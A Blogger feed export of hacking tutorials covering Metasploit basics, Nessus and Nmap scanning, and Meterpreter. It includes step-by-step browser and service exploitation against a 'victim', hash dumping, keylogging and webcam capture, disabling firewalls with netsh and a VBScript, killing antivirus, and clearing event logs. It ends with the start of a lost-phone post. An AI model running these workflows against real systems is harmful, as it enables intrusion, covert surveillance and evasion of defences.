Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-56039334156424130522015-05-15T20:31:00.001-07:002015-05-15T20:44:10.942-07:00Nessus and POST Exploitation in MetaSPLOIT<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-size: large;">Nessus Basics </span><br />
<br />
Nessus is a properietary vulnerability scanner<br />
It detects<br />
> vulnerabilites <br />
> misconfiguration<br />
> default credentials on target system <br />
> used in various compliance audits as well<br />
===================<br />
Learn how to use Meterpreter in Metasploit => <a href="http://prasoon-nigam.blogspot.in/2015/05/meterpreter-basics.html" target="_blank">Meterpreter Basics</a><br />
<br />
Metasploit Basics => <a href="http://prasoon-nigam.blogspot.in/2015/05/metasploit-basics.html" target="_blank">Metasploit Basisc </a><br />
======================================================<br />
<br />
To open Nesses<br />
msfconsole -> type load nessus -> nessus_help<br />
<br />
Connect to Nessus from our localhost for starting the scans <br />
syntax<br />
nessus_connect <your username>:<your Password>@localhost:8834 <ok><br />
Example<br />
nessus_connect prasoonnigam:hacker09@localhost:8834 ok<br />
8834 is the default port<br />
<br />
Check the nessus scanning policies<br />
<br />
Syntax<br />
nessus policy list<br />
<br />
Four policies of Nessus <br />
1) External network scan -> used for scanning network vulnerabilities externally<br />
2) Internal network scan -> used for scanning network vulnerabilities internally<br />
3) Web App Tests -> used for scaning web application for vulnerabilities<br />
4) PCI-DSS (Payment Card Industry-data Security Standard) audits -> used in payment card industry as the data security standard <br />
<br />
Scanning victim machine<br />
<br />
> have to create a new scan<br />
syntax<br />
nessus_scan_new <policy ID> <scan name> <target ip><br />
example<br />
nessus_scan_new -2 windowssan 192.168.3.2<br />
> checking the status <br />
nessus_scan_status<br />
> checking for the report list<br />
nessus report list<br />
> opening the report <br />
nessus_report_hosts <report ID><br />
example : nessus_report_hosts dgfwef82nd8934y89hg9rety389<br />
>> when u see the severity, u r getting the total number of vulnerabilities <br />
<br />
Classifications of the different vulnerabilities <br />
<br />
> Sev 0 indicates high level vulnerabilities <br />
> Sev 1 indicates medium level vulnerabilities<br />
> Sev 2 indicates low-level vulnerabilities<br />
> Sev 3 indicated informational vulnerabilities <br />
<br />
Command to see all the vulnerabilities <br />
<br />
nessus_report_hosts_ports <target IP> <report id><br />
example : nessus_report_hosts_ports 192.168.11.164 asjfh398fdbf5t705tdb4t9<br /><br />Report Importing In Metasploit<br /><br />> Importing Nmap report via msfconsole in PostgreSQL database<br /> save any host and save the nmap report in XML format<br /><br />>> Check the database connectivity with the msfconsole <br /> syntax : db_status<br /><br />> import the Nmap report <br /> syntax: db_import <report path name with name><br /> example: db_import /root/Desktop/scan.xml<br /><br />>> see the host details<br /> syntax: host <ip> <hostname on which nmap scan performed><br /> Example: host 192.168.11.23<br />you will get to know OS and Mac Address<br /><br />>> check the open port and services running on those ports <br /> syntax: services <hostname><br /> example: services 192.168.0.102<br /><br />> Importing the report of nessus in msfconsole<br /> syntax: db_import <report path name with file location><br /> example: db_import /root/Desktop/Nessus_scan.nessus<br /><br />>check the vulnerabilities <br /> syntax: vulns <ip (hostname)><br /> example: vulns 192.168.22.16<br /><br /><br /><span style="font-size: large;">CLient Side Exploitation </span><br /><br /> What are Client Side Attacks ???<br /><br />> The Server is the main computer that shares its resources over the network and the client which are the other computer on the network use these resources..<br /><br />> There is a large arrau of attacks that may be launched against the clients <br />such as <br />> browser-based attacks <br />> vulnerable service exploitation <br />> Client OS have multiple applications such as PDF Reader, Document Reader and instant messenger <br /><br />> The malicious code may exploit any form of ActiveX JAVA and Flash.. in browser<br /><br />Exploits of Victim browser<br /><br />> browser autopwn<br /> msfconsole -> use auxiliary/server/browserautopwn -> show options -> set LHOST 192.168.2.23 (required field that to be filled) -> set SRVHOST 192.168.3.22 (SRVHOST means localhost address (set out local machine address)) -> set SRVPORT 80 (SRVPORT means the local port address) -> run<br /><br />after type in the run it starts the exploit modules on the localhost and also it provides the malicious URL which must be given and must be clicked <br /><br /> -> TO check the meterpreter session that was created type in "sessions"<br /><br />(getting into the computer and creating session)<br />-> session (shows the ID) -> session -i 1 <id> -> sysinfo<br /><br />> Internet Explorer Shortcut Icon Exploit<br /> shortcut icons that contain a malicious DLL <br /><br /> msfconsole -> use windows/browser/ms10_046_shortcut_icon_dllloader -> show options -> set SRVHOST 192.168.2.3 -> set SRVPORT 80 -> set URIPATH / -> exploit -> sessions -> sessions -i 1<br /><br />> Internet Explorer malicious VB script code execution exploit<br /><br /> msfconsole -> use exploit/windows/browser/ms10_022_ie_vbsscript_winhlp32 -> show options -> set SRVHOST 192.168.11.105 -> set SRVPORT 80 -> set URIPATH / -> exploit -> send the URL <br />after F1 is pressed the malicios VB script will run in the browser and send a payload names calc.exe -> sessions -> sessions -i 1<br /><br /><span style="font-size: x-large;"><br /> POST Exploitation</span><br /><br /> Post Exploitattion basically means the phases of operation once a victim's system has been compromised by the attacker.The value of the compromised system is determined by the value of the actual data stored in it and how an attacker may make use of it for malicious purposes... <br /> The concept of post exploitation has risen from this fact only as to how you can use the victim's compromised system's information; documenting it, and haing an idea of the configuration channels...<br /><br />Phase of post exploitation<br />> Understanding the victim<br />> Privilege escalation<br />> Cleaning tracks and staying undetected<br />> Collecting system information and data<br />> Setting up backdooring and rookits<br />> Pivoting to penetrate internal networks<br /><br />Lets the first phase of post exploitation by gathering as much information <br /><br />Type in :<br /> sysinfo (get system info)<br /> getpid (get process ID)<br /> ps (get process list)<br /> run checkvm (the victim's system is a virtual machine or not)<br /> idletime (to check whether the victim is active or not)<br /> run get_env (the victim's system evironment by another meterpreter script)<br /> ipconfig (check the victim's system IP address)<br /> route (to see the full network settings)<br /> run getcountermeasure (for mapping the security configuration of the victim's systmem)<br /> run getgui (enable the victim's Remote Desktop Protocol service)<br /> run getgui -e<br /> run gettelnet (enabling the telnet service)<br /> run gettelnet -e<br /> run get_local_subnets (see the local subnet of the victim's)<br /> run hostedit (allows an attacker to add host enteries in the windows host file)<br /> run hostedit -e 127.0.0.1 www.apple.com<br /> run enum_logged_on_users (how many users are currently logged in)<br /> run enum_logged_on_users -c <br /> run get _application_list (it will show us all the installed applications)<br /> run windows/gather/forensics/enum_drives (gathering physical drive)<br /> run windows/gather/enum_ms_product_keys (get OS system's product key)<br /> run windows/gather/credentials/windows_autologin (check autologin feature)<br /> run winenum (dump some juicy information such as hashes and tokens)<br /> cd /root/.msf4/logs/scripts/winenum/Exploit-0FE265D 2013027.2532 -> LS<br /> cat hashdump.txt<br /> run scraper<br /> .msf4/logs/scripts/scraper/192.168.0.104_201330 -> cat services.txt<br />
<br />
<br />
Post Exploitation Privilege Escalation <br /><br />> Post exploitation is divided into five phases <br /><br />Understanding Privilege Escalation <br /> Privilege Escalation in simple terms is gaining elevated privileges to resources that are normally protected and whose access is denied to normal or unauthorized users....<br />Example:- Things we can do after privilege escalation are installing malicious software for unethical uses<br />> deleting user files<br />> denying resources to a particular user<br />> viewing private information<br /><br />Divided into two major forms :-<br />> Vertical Privilege Escalation <br />> Horizontal Privilege Escalation<br /><br />Vertical Privilege Escalation<br /> a lower privileged user or application may access function that are reserved only for authorized or administrative users. This features is also known as privilege elevation..<br /><br />Horizontal Privilege Escalation<br /> This escalation usually happens on a horizontal scale with repect t user rights. A normal user accessing the resources reserved for another person's resources<br /><br />Exploiting the vicitim's system<br />> we use a software name called mini-share (free file sharing software)<br /><br />Commands<br /> open msfconsole -> use ecploit/windows/http/minisgare get overflow -> show options -> set RHOST 192.168.11.203 (victim ip) -> set RPORT 80 -> show targets -> set TARGET 3 (choose the options) -> exploit -><br /><br />(Meterpreter) getuid -> getsystem -h -> getsystem -t 0 -> ps<br /><br /><br />Privilege escalation by post exploitation<br /> Module uses the built-in getsystem command to escalate the current session to the SYSTEM account from an administrator user account.<br /><br />(Meterpreter) run post/windows/escalate/getsystem<br /><br /> run post/windows/escalate/service_permissions <br />(Module exploits the existing administrative privileges to obtain a system session. If it Fails in the 1st instance, the module inpsects the existing service and looks for insecure file permissions that are vulnerable to an attack)<br /><br />Different Exploit for compromising the target system<br /> msf> exploit/windows/browser/ms10 002 aurora -> show options -> set SRVHOST 192.168.0.109 (Victim IP) -> exploit -> session -> session -i 1<br /><br /><br />Post Eploitation Cleaning Up Traces<br /> Cleaning Tracks and trace through log deletion and staying undetected by disablig the firewall and antivirus systems<br /><br />Why Firewall is important ?<br />A firewall is basically software or hardware that blocks unauthorized entry to a system or a network. A firewall also keeps track of intrusions and security breaches. If the firewall is well-configured, each unauthorized entry is blocked and logged in the security logs. It controls the incoming and outgoing network traffic and analyzes the data packets.<br />It decides whether it should allow the packet through the firewall or not.<br /><br />A firewall is classified into three different types:<br />> Packet Filter Firewall<br />> Stateful Firewall<br />> Application Firewall<br /><br />Packet Filter Firewall <br /> These types of firewall are associated with the first three layers of the OSI Model with a little help from the transport layer as well, for the source and destination port numbers. When a packet travels towards the packet filter firewall, it is analyzed with the help of set rules to match against.<br /><br />Stateful Firewall <br /> These are also called second-generation firewalls. These firewalls work on the states of a network connection.Throughout the state, it determines whether to allow the packet into the network or not.<br /><br />Application Firewall<br /> These are known as third-generation firewalls. Application firewalls work on application and protocols like HTTP, SMTP and SSH.They also help in detecting if an unwanted protocol is trying to bypass the firewall on an allowed port.<br /><br />commands <br /> run getcountermeasure<br /> operational mode = Enable<br /><br /> -> shell -> netsh firewall show opmode<br />see if the firewall is enable or not <br /> -> shell -> netsh firewall set opmode mode=disable <br /><br />Disabling firewalls through VBScript <br /><br /> Code <br /> Set objFirewall = CreateObject("HNetCfg.FwMgr")<br /> Set objPolicy = objFirewall.LocalPolicy.CurrentProfile <br /> objPolicy.FirewallEnabled = FALSE<br />save code .vbs extension<br /><br />syntax upload <source filepath> <destination filepath><br />Example upload root/Desktop/disable.vbs C:\<br /><br /> Goto destination and execute it <br /><br /><br />Antivirus Killing and Log Deletion<br /><br />killing the processes of an antivirus with the help of post exploitation Meterpreter script known as killav<br /><br />Script of killav.rb<br /> opt/framework/msf3/scripts/killav.rb<br /><br />in killav.rb the name of the antivirus must be present there then only antivirus must be stoppped..<br /><br />(Meterpreter) run killav -> tasklist (to see the taskmanager process) or tasklist /svc or tasklist /svc |find/I "avg"<br /><br />> TO see the property th processes that are running <br /> sc queryex avgwd -> sc config (process name) start= disabled (disable the process which cannot be killed)<br />Terminating a processes<br /> taskkill /F /IM "antivirus name*"<br /><br /><br />Clearing tracks to be SAFE<br /><br />Clearing all the log<br /> (Meterpreter) clearev<br /></div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-31172528053450352942015-05-02T00:51:00.000-07:002018-06-18T07:27:23.727-07:00NMAP in METASPLOIT <div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-size: x-large;"> <span style="color: red;">NMAP (Network Mapper)</span></span><span style="color: red;"><br /> using nmap in metasploit </span><br />
> Nmap is a powerful security scanner developed by Gordon Lyon<br />
<br />
<br />
===============<br />
Metasploit => <a href="http://prasoon-nigam.blogspot.in/2015/05/metasploit-basics.html" target="_blank">How to use metaploit click on me :)</a><br />
<br />
MeterPreter BASics => <a href="http://prasoon-nigam.blogspot.in/2015/05/meterpreter-basics.html" target="_blank">How to use Meterpreter click one me :)</a><br />
=============================================<br />
<br />
<b><br />NMAP TUTORIALS => <a href="http://prasoon-nigam.blogspot.in/2012/03/nmap-tutorial-backtrack.html" target="_blank">NMAP TUTORIALS CLick on me :)</a><br /><br /><br />How nmap works ??</b><br />
> Whenever Nmap performs a scan, it delivers an ICMP echo request to the destination for checking whether the host is alive or dead. This process saves much time for Nmap when it scans multiple hosts at a time. Sometimes ICMP requests are blocked by firewalls, so as a secondary check namp tries to connect to default open ports such as 80 and 443, which are used by the web server or HTTP..<br />
<br />
Working with NMAP in Metasploit<br />
<br />
Nmap is used for<br />
> hosts<br />
> service<br />
> open ports detection on a computer network<br />
<br />
Nmap has many features <br />
> stealth scan<br />
> aggressive scan<br />
> firewall evasion scan <br />
> has the abiity to fringerprint operating system<br />
>>>>> Nmap has its own Nmap Scripting Engine -> can be used with Lua programming language<br />
<br />
Nmap scanning using Metasploit<br />
Nmap with no commands will perform a basic scan on the target address <br />
<br />
syntax<br />
nmap <target> <ip_address><br />
nmap 192.168.11.29<br />
<br />
<b>Scan multiple targets </b><br />
syntax <br />
nmap <target target><br />
nmap 192.168.11.46 192.168.11.29<br />
<br />
<b>Scan a list of targets </b><br />
>> just need to separate all targets by a new line or space <br />
for example <br />
192.168.11.29<br />
192.168.11.86<br />
192.168.11.36 and so on <br />
<br />
syntax<br />
nmap -iL <list.txt><br />
nmap -iL /root/Desktop/list.txt<br />
<br />
<b>Nmp Options </b><br />
> Nmap commands options <br />
<span style="color: #444444;">©Pprasoon Nigam</span><br />
Feature Options<br />
> Don't ping -PN<br />
> Perform a Ping Only Scan -sP<br />
> TCP SYN Ping -PS<br />
> TCP ACK Ping -PA<br />
> UDP Ping -PU<br />
> SCTP INIT Ping -PY<br />
> ICMP Timestamp Ping -PP<br />
> ICMP Echo Ping -PE<br />
> ICMP Address Mask Ping -PM<br />
> IP Protocol Ping -PO<br />
> ARP Ping -PR<br />
> Traceroute -traceroute<br />
> Force Reverse DNS Resolution -R<br />
> Disable Reverse DNS Resolution -n<br />
> ALternative DNS Lookup --system-dns<br />
> Manually Specified DNS Server(S) --dns--servers<br />
> Create a Host List -sL<br />
<br />
Examples<br />
> nmap -sP 192.168.11.60 (Ping only scan)<br />
> nmap -PA 192.168.11.46 (TCP ACK Ping)<br />
> nmap -PE 192.168.11.44 (ICMP echo ping)<br />
> nmap -R 66.147.244.90 (Force reverse DNS resolution)<br />
<br />
<br />
NMAP advanced scanning options<br />
<br />
Features Options<br />
> TCP SYN Scan -sS<br />
> TCP Connect Scan -sT<br />
> UDP scan -sU<br />
> TCP Null Scan -sN<br />
> TCP Fin Scan -sF<br />
> Xmas Scan -sX<br />
> TCP ACK Scan -sA<br />
> Custom TCP Scan -scanflags<br />
> IP Protocol Scan -sO<br />
> Send Raw Ethernet Packets --send-eth<br />
> Send IP Packets --send-ip<br />
<br />
FLAGS Usage<br />
> SYN Synchronize<br />
> ACK Acknowledgement<br />
> PSH Push<br />
> URG Urgent<br />
> RST Reset<br />
> FIN Finished<br />
<br />
<br />
Examples<br />
> nmap -sS 192.168.11.46 (TCP SYN scan) attempts to identify ports by sending a SYN packet to the target & waititng for a response. A SYN packet is basically sent to indicate that a new connection is to be established. This type is also know as the stealth scan.<br />
> nmap -sN 192.168.2.33 (TCP null scan) sends packets without TCP flags enabled . This done by setting the header to zero for fooling a firewalled system in getting a response them<br />
<br />
Custom TCP Scan <br />
> nmap -scanflags SYNURG 192.168.0.102<br />
<br />
Port scanning options <br />
Features Options<br />
> Perform a Fast Scan -F<br />
> Scan Specific Ports -p(port)<br />
> Scan Ports by Name -P(name)<br />
> Scan Ports by Protocol -p U:(UDP Ports), T:(TCP Ports)<br />
> Scan All Ports -p"*"<br />
> Scan Top Ports --top-porys<br />
> Perform a Sequential Port Scan -r<br />
<br />
Examples<br />
> nmap -F 1962.168.11.46 (Fast scan)<br />
> nmap -p http 192.168.3.8 (scan port by name)<br />
> nmap -r 192.168.3.88 (Performing a Sequential port scan) (useful for evading firewall and Intrusion Prevention System<br />
<br />
Nmap has some feature that help to byoass these protection mechanism as well <br />
<br />
Feature Options<br />
> Fragments Packets -f<br />
> Specify a Specific MTU --mtu<br />
> Use a Decoy -D<br />
> Idle Zombie Scan -sI<br />
> Manually Specify a Source Port --source-port<br />
> Append Random Data --data-length<br />
> Randomize Target Scan Order --randomize-hosts<br />
> Spoof MAC Address -spoof-mac<br />
> Send Bad Checksums --basums<br />
<br />
Examples<br />
> nmap -f 192.168.12.88 (fragment packets) Nmap sends very small 8 byte packets.. useful for evading improperly configured firewall system<br />
<br />
> nmap -sI 192.168.3.88 192.168.11.56 (Idle Zombie scan) very unique scanning technique in which Nmap uses zombie host for scanning the target, In here use 2 IP address <br />
<br />
Spoof MAC Address<br />
This technique is useful when a firewalled-system detects a scanning process via the system's MAC address and blacklistes those MAC Address<br />
MAC addresses can be spoofed via three different arguments <br />
<br />
Arguments Function<br />
0 (zero) Generates Random MAC Address<br />
Specific Mac Address Uses the specified MAC Address<br />
Vendor Name Generate a MAC Address from the specifies Vendor<br />
(such as Apple Dell HP etc)<br />
<br />
syntax<br />
nmap -sT -Pn --spoof-mac Apple 192.168.11.29<br />
<br />
<b>Save Nmap output results </b><br />
Features Options<br />
Save Output to a Text File --oN<br />
Save Output to a XML File --oX<br />
Grepable Output -oG<br />
Output All Supported File Type -oA<br />
Periodically Display statistics --stats-every<br />
133t Output -oS<br />
<br />
syntax<br />
nmap -oX <scan.xml> <target><br />
<br />
example<br />
nmap -oN scan.txt 192.168.11.46<br />
<br /></div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com1tag:blogger.com,1999:blog-5075788214695190708.post-78034675346454379032015-05-02T00:25:00.000-07:002015-05-02T00:25:00.469-07:00METERPRETER BASICS<div dir="ltr" style="text-align: left;" trbidi="on">
<br /> <span style="font-size: x-large;"><b>METERPRETER </b></span><i><b>Basics</b></i> <br /><br />AFTER U GET A SESSION WITH THE HELP OF <a href="http://prasoon-nigam.blogspot.in/2015/05/metasploit-basics.html" target="_blank">Metasploit </a> HOW TO USE <b>meterpreter</b> HERE IS ARE THE basics<br /><br />HERE's THE SECRET <br /><br /><br />Meterpreter is one of the spearheads in the metasploit framework.. <br />It is used as a payload post exploitation of a vulnerable system. <br />It is used in memory DLL injection Stagers and is extended over the network at runtime.<br />In Memory DLL, Injection is a technique used for injection code within that address space of currently running process by forcing it to a load a DLL (Dynamic-Link Libarary) file<br /><br />The single payload is very effective with its multiple capabilities <br />> helps in acquiring password hashes of a victim machine<br />> runnng a kylogger and <br />> privilege escalation.<br /><br />The stealth feature makes it undetectable to many antivirus and host based intrusion detection systems<br />Meterperter also has the capability to switch between different processes to which it gets attached through DLL injections and stays by clinging to running application on the compromised host rather than creating on the system <br /><br /><b>Classified commands </b><br /><br />> Command type<br />> Command name<br />> Description<br /><br /><b>Commands </b><br />Process listing<br /><br />> getuid -> It gets the system ID & the name of the computer <br />> kill -> It terminates a process<br />> ps -> It lists the running processes <br />> getpid -> It gets the current process identifier<br /><br /><b>Keylog Usage</b><br />> keyscan_start -> It starts the keylogging session<br />> keyscan_stop -> It stops the keylogging session<br />> Keyscan_dump -> It dumps the keystrokes captured from the victim machine<br /><br /><b>Session</b><br />> enumdesktops -> It lists all of the accessible desktops and workstations<br />> getdesktop -> It gets the current Meterpreter desktop<br />> setdesktop -> It changes the Meterpreter's current desktop<br /><br /><b>Sniffer Functions </b><br />> use sniffer -> It loads the sniffer functions<br />> sniffer_start -> It starts the sniffer for the interface<br />> sniffer_dump -> It dumps the network capture of the victim machine locally<br />> sniffer_stop -> It stops the sniffer for the interface<br /><br /><b>Webcam Commands </b><br />> webcam_list -> It lists all of the webcams of the system<br />> webcam_snap -> It capture snaphots of the victim machine <br />> record_mic -> It records the sound of the environment from the default microphone on the machine <br /><br />> sysinfo -> to check the system information <br />> screenshot -> capture a screenshot of the victim machine<br />> ps -> will show the running processes<br /><br />*> migrate <pid> :: example migrate 1512 (explorer.exe) -> getpid -> keysscan_start (and wait for few minutes to capture the keystrokes of the victim machine ) -> keyscan_dump -> keyscan_stop (to dump and stop the keystrokes command )<br /><br />*> webcam_snap ( u get the snap from the webcame)<br /><br />*> shell (to get the command shell of the victim) -> mkdir <directory name> (creating a directory) (shell is the cmd of the of the victim computer)<br /><br /><br />Vulnerability scanning and Information Gathering <br /><br />:> Information Gathering Through Metasploit <br />Information gathering is a process of collecting information about a victim techniques. <br />Divided into two steps <br />> Footprinting <br />> Scanning<br /><br />The Metasploit auxilliary modules have various scans from ARP to SYN<br />service-based scans <br />> HTTP<br />> SMB<br />> SQL<br />> SSH<br /><b><br />Methods for Information Gathering</b><br /><br />>> whois <br /> It is widely used for quering databases that store registered users of an Internet resource <br /><br />type in msfconsole <br /> whois <domain name><br />example whois hackingrtz.com<br /><br />To get e-mail we use e-mail harvesting <br />> E-mail harvesting is very useful tool to get the e-mail IDs associated with a particular domain<br /><br />syntax<br /> use auxiliary/gather/ search email collector -> show options -> set domain <domain name> -> run<br />for example :- set domain hackingartz.com<br /><br />Active Information Gathering <br /><br />useful auxiliary scanner is the telnet version scanner <br /><br />syntax <br /> use auxiliary/scanner/telnet version -> show options -> See the area is empty<br /><br />syntax<br /> set RHOSTS <target ip address> <br /> for example :- set RHOSTS 192.168.0.103 -> run <br /><br />To find whether a Remote Desktop connection (RDP) is available by RDP scanner<br />TO know aboout the port number RDP port<br /><br />Syntax : type in <br /> use auxiliary/scanner/rdp/ms12_020_check -> show options<br />getteing the port we set RHOST <br /><br />syntax<br /> set PORTS (port no.) -> set PORTS 3389<br /> set RHOST (ip address) -> set RHOST 192.168.11.46<br />done with all the options type run <br /></div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-77306564671127632015-05-01T23:38:00.003-07:002018-06-18T07:57:52.656-07:00MetaSPLOIT BASICS <div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<span style="font-size: x-large;"> <span style="color: red;"> METASPLOIT</span></span><br />
<br />
<span style="font-size: small;">>Metasploit Framework is an open source project created by HD Moore in 2003 acquired by Rapid 7 LLC on October 21,2009.<br />>Which includes hundreds of exploits and payloads.<br />>It is considered one of the best penetration tools with support for vulnerability assessment using Nessus and other famous tools.<br />>Its written in Ruby....<br />>Metasploit supports all platforms including Windows, Linux and MAC Os</span><br />
<span style="font-size: small;">*************<br />use nmap in metassploit => <a href="http://prasoon-nigam.blogspot.in/2015/05/nmap-in-metasploit.html" target="_blank">NMAP in metasploit click on me :)</a></span><br />
<span style="font-size: small;">METERPRETER BASICS => <a href="http://prasoon-nigam.blogspot.in/2015/05/meterpreter-basics.html" target="_blank">LEARN how to use METERORETER Click on me :)</a></span><br />
Cross Site Scripting => <a href="http://prasoon-nigam.blogspot.com/2018/06/cross-site-scripting-xss-definition.html" target="_blank">Click on me :)</a><br />
<span style="font-size: small;">***************************************<br /><br />Metsaploit Framework these <br />> MsfGUI <br />> Msfcli<br />> Msfweb<br />> Metasploit Pro<br />> Armitage<br /><br />The library architecture in Metasploit is as follows:<br /><br /><b>> Rex:</b> This is the basic library used is Metasploit for various protocols, transformations and socket handling. It supports SSL, SMB, HTTP, XOR, BASE64, and random text...<br /><br /><b>>Msf :: Core</b>: This library defines the framework and provides the basic application interface for Metasploit.<br /><b><br />>Msf::Base</b> This library proviedes a simplified and friendly applcation interface for the the Metasploit Framework<br /><br />*) cd /opt/metasploit/msf3 to enter the metasploit framework directory -> ls<br /><br />> <b>The important directories listed are</b> <br />data<br />external<br />tools<br />plugins<br />scripts<br /><br />cd data/ => contains meterpreter exploits wordlists templates & many more<br /><br />cd meterpreter/ => .dll files (.dll files as well as other interesting things, which are typically required to enable the Meterpreter Functionality called post exploitation.)<br /><br />> wordlist directory -> directory in the data directory. This directory contains the list of usernames and paswords for different services such as HTTP, Oracle, Postgres, VNC, SNMP and more.<br /><br />> To update the metasploit -> msfupdate<br /><br /><b>Exploits</b> </span><br />
<span style="font-size: small;">An exploit is a computer program that takes advantage of a particular vulnerability <br />> cd /opt/metaspoit/msf3/modules/exploits -> ls -> cd windows (going into windows) -> ls<br />so view the code of any exploit we type -> cat <exploitname> -> cat ms08_067_netapi.rb<br /><br /><b>Auxiliary</b><br />Auxiliary are exploits without payload. <br /><br />> There are different types of auxiliary modules such as<br />scanner for protocols<br />Networks protocol fuzzers<br />Port scanner modules <br />wireless <br />Denial service modules <br />Server modules <br />Administrative access exploits and so on.<br /><br />**) ls -> ftp -> cat <modules name> to see the exploit <br /><br /><b>PAYLOADS</b>A payload is a piece of software that runs after a system is compromised. The payload us typically attached to and delivered with an exploit<br /><br />*) 3 different types of payloads <br />> Singles<br />> Stagers <br />> Stages <br /><br /><b>Stages :</b> The main role of stages payload is that they use tiny stager to fit into small exploitation spaces. During exploitation, an exploit developer has a very limited amount of memory that he can play with. The stagers use this space and their work is to pull down the rest of the stages payload.<br />Stages are the type of payload that are downloaded and executed by the stagers payload such as Meterpreter, VNC server and so on.<br /><br /><b>Singles :</b> Singles are self contained payloads for a specific tasl such as creating a user, binding a shell, and so on.<br /><br /><b>Stagers :</b> The stagers use the space and their work is to pull down the rest of the stages payload.<br />Stagers are payloads that makes a connection between the attacker ad the victim machine. <br />Example <br />If i want to inject a meterpreter payload we cannot fit the entire Meterpreter DLL into one payload, so the entire process is broken up into two parts. The first is the smaller payload called stagers. After the stagers are executed they make a network connection between the attacker and the victim. <br />Over this network connection a larger payload is delivered to the victim machine and this larger payload is known as stages.<br /><br /><br />> Payloads are categorized according to OS such as AIX, BSD, Windows, Linux and so on.<br /><br /><b>EXPLOITATION </b><br /><br />Exploitation refers to the ar of compromising a computer system. The basics of computer exploitation involves a deep understanding of the vulnerabilities and payloads. <br />An exploit is a piece of well-written code, compiled and executed on a trageted system, which may compromise that system.<br /><br />An exploit usually targets a known vulnerability, a flaw in a service or a poorly written code. <br /><br /><b>BASIC TERMS OF EXPLOITATION </b><br /><br /><b>> Vulnerability </b>: A vulnerability is a security hole in software or hardware, which allows an attacker to copromisea system. A vulnerability can be as simple as a weak password or as complex as a Denial of Service attack <br /><br /><b>> Exploit : </b>An exploit refers to a well known security flaw or bug with which a hacer gains entery intoa system. An exploit is the actual code with at attacker takes advantage of a particualar vulnerability.<br /><br /><b>> Payload : </b>Once an exploit exectes on the vulnerable system and the system has been compromised, the payload enables us to control the system. The payload is typically attached to the exploit and delivered. <br /><br /><b>> Shellcode : </b>This is a set of instructions usually used as a payload when the exploitation occurs.<br /><br /><b>> Listener : </b>A listener works as component waiting for an incoming connection.<br /><br />======================<br />KEEP safe ur ANDROID => <a href="http://prasoon-nigam.blogspot.in/2014/08/how-to-find-stolen-or-lost-android-phone.html" target="_blank">CLICK ON me ;)</a><br />10 PROXY Websites => <a href="http://prasoon-nigam.blogspot.in/2013/10/top-10-proxy-websites-to-unblock-any.html" target="_blank">Click on me :))</a><br />=============================================<br /><br />The Biggest question of how exploitation actually works ?????<br /><br />Heres' the SECRETS FINALLY REVEALED <br /><br />An attacker basically sends an exploits with an attached payload to the vulnerable system.<br />The exploit runs first and if it succeeds, the actual code of the payload runs.<br />After the payloads runs, the attacker gets fully privileged access to the vulnerable system, and then he may download data upload malware, virus, backdoors or whatever he wants.<br /><br />How to compromising a system <br /><br />Step 1 : Scan the IP Address to find<br /> open ports -> operating system -> services <br />Step 2 : Identifying a vulnerable service and finding an exploit in Metasploit for that particular service.<br /><br />Step 3 : Is the exploit is not available in Metasploit :: go for through the internet databases such as <br />>> www.securityfocus.com<br />>> www.exploitdb.com<br />>> www.1337day.com<br /><br />Step 4 : After successfully finding an exploit<br /><br />Step 5 : we launch exploit and compormise the system.<br /><br /><br /><b>Tools used </b><br /><br />> Port scanning are Nmap (Network Mapper),Autoscan, Unicorn Scan and so on.<br /><br />Syntax for nmap<br /> nmap -v -n ip address<br /><br />-v verbose -> to get verbose output<br />-n -> parameter to disable reverse DNS resolutions<br /><br />Syntax for intense scan by nmap <br /> nmap -T4 -A -v ip address<br /><br />====================<br />NMAP tutorials => <a href="http://prasoon-nigam.blogspot.in/2012/03/nmap-tutorial-backtrack.html" target="_blank">Click on me :)</a><br />Recover JPEG FILES => <a href="http://prasoon-nigam.blogspot.in/2012/05/recover-jpeg-files-with-backtrack.html" target="_blank">CLick on me :))</a><br />==================================================<br /><br />After gathering information -> opne msfconsole -> search dcom (it searches all of the windows RPC Related exploits in its database.........<br /><br />Searching for an exploit in Metasploit through the <br />syntax<br />search <servie name> command<br />© Pprasoon nigam<br />Note : if the exploit is not available in Metasploit, then we have to search the Internet exploit database for that particular exploit.<br /><br />>> How to search for an exploit on these online services <br />open this website => www.1337day.com <br /> Search for exploits on the Windows RPC service<br />find the exploit and save it <br /><br />Now we exploit the target machine <br /><br />as we know that scanned the IP address and found all the ports <br />and exploit one those ports <br /><br />launch the terminal -> type gcc <exploit name with path > -o <exploitname> <br />for example <br />gcc dcom.c -o dcom<br /><br />./<filename> <br /><br />use exploit/windows/smb/ms08_067_netapi (in msf console) and press enter <br /><br />then show options <br />RHOST (remote host) <br /><br />set RHOST ip address<br /><br />exploit</span><br />
MORE metasploit BASICS and HACKING => METERPRETER => <a href="http://prasoon-nigam.blogspot.in/2015/05/meterpreter-basics.html" target="_blank">Meterpreter Click on me :)</a> </div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-27016474651379319322014-08-13T21:26:00.000-07:002014-08-14T10:10:05.386-07:00 How to find STOLEN or LOST android phone<div dir="ltr" style="text-align: left;" trbidi="on">
This blog of mine will be liked and loved by all the people who love their ANDROID phones / tabs<br />
<br />
SO what i gonna tell you is that how to find or search your lost and stolen mobile :)<br />
<br />
phone can be stolen or lost or misplaced anytime anywhere and by anyone <br />
and sometimes no one is there to help you and people come just for sympathy <br />
"OH ! its so sad your 40,000/- mobile lost"<br />
"OMG how could you misplace your mobile in the shop"<br />
<br />
and what we do is shed some tears take help from police and or any computer engineers and in response we get nothing and have to buy a small phone or less valuable phone that we brought before :(<br />
<br />
A mobile phone is what for us ??<br />
<br />
* A friend that makes us time-pass when we are bored <br />
** A place were we keep our secrets<br />
*** A place were we have many memories in text (sms) or in pics (photos)<br />
**** A helper when you are late coming to home <br />
***** Nights talks and love sharing with wife or girlfriend <br />
****** Keep you in touch with all the people you want in your life and much more <br />
<br />
